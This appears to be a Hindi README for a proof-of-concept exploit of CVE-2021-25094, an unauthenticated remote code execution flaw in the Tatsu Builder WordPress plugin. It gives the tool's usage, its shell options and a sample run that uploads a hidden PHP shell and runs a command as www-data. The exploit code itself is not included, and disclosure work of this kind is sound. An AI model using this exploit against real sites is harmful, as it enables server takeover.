
बिना प्रमाणीकरण के Tatsu Builder WordPress प्लगइन में रिमोट कोड निष्पादन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट (CVE-2021-25094)। एकाधिक शेल तकनीकों, प्रॉक्सी और संपीड़न स्तरों का समर्थन करता है।
Tatsu Builder <= 3.3.11 में एक अप्रमाणित RCE का सरल PoC एक उदाहरण के रूप में प्रदान किया गया है।
पूरा लेख यहाँ: https://darkpills.com/wordpress-tatsu-builder-preauth-rce-cve-2021-25094/
उपयोग:
python3 exploit-rce.py [-h] [--technique TECHNIQUE] [--customShell CUSTOMSHELL] [--keep KEEP] [--proxy PROXY] [--compressionLevel COMPRESSIONLEVEL] url cmd
positional arguments:
url Wordpress असुरक्षित URL (उदाहरण: https://mywordpress.com/)
cmd OS कमांड निष्पादित करने के लिए
optional arguments:
-h, --help यह सहायता संदेश दिखाएं और बाहर निकलें
--technique TECHNIQUE
शेल तकनीक: php | htaccess | custom
--customShell CUSTOMSHELL
एक कस्टम PHP शेल फ़ाइल प्रदान करें जो $_POST['text'] इनपुट के रूप में base64 cmd लेगी
--keep KEEP अपलोड किए गए PHP शेल को स्वचालित रूप से नष्ट न करें
--proxy PROXY HTTP प्रॉक्सी निर्दिष्ट करें और उपयोग करें (उदाहरण: http://localhost:8080)
--compressionLevel COMPRESSIONLEVEL
ज़िप फ़ाइल का संपीड़न स्तर (0 से 9, डिफ़ॉल्ट 9)
उदाहरण:
└─$ python3 exploit-rce.py http://wordpress/ id
|=== Tatsudo: pre-auth RCE exploit for Tatsu wordpress plugin <= 3.3.11
|=== CVE-2021-25094 / Vincent MICHEL (@darkpills)
[+] Generating a zip with shell technique 'php'
[+] Uploading zip archive to http://wordpress//wp-admin/admin-ajax.php?action=add_custom_font
[+] Upload OK
[+] Trigger shell at http://wordpress/wp-content/uploads/typehub/custom/hjf/.bfzwt.php
[+] Exploit success!
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell file has been auto-deleted but parent directory will remain on the webserver
[+] Job done